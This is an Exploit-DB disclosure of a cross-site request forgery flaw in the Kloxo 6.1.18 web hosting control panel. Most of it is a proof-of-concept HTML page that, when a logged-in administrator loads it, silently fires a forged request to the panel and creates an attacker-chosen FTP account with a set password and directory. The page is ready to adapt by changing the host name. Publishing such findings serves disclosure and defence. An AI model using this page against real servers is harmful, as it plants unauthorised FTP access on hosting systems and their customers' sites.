Kloxo 6.1.18 Stable - CSRF Vulnerability



EDB-ID: 32665 CVE: N/A OSVDB-ID: 105667
Author: Necmettin COSKUN Published: 2014-04-02 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Exploit Title		:Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage	:http://lxcenter.org/software/kloxo
# Version			:6.1.18
# Exploit Author	:Necmettin COSKUN =>@babayarisi
# Blog				:http://www.ncoskun.com http://www.grisapka.org
# Discovery date	:03/12/2014
# CVE				:N/A
 
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
 
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.

Poc Exploit
================

 <html>
 <head><title>Kloxo demo</title></head>
 <script type="text/javascript">
 function yurudi(){
		///////////////////////////////////////////////////////////
		//Kloxo 6.1.18 Stable CSRF Vulnerability		 //	
		//Author:Necmettin COSKUN => twitter.com/@babayarisi	 //
		//Blog: http://www.ncoskun.com | http://www.grisapka.org //
		///////////////////////////////////////////////////////////
		//Remote host
		var host="victim.com";	
		//New Ftp Username
		var username="demouser";
		//New Ftp Password
		var pass="12345678";
		//This creates new folder under admin dir. /admin/yourfolder
		var dir="demodirectory";
		//If necessary only modify http to https ;)
		var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";

		document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
 
 
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!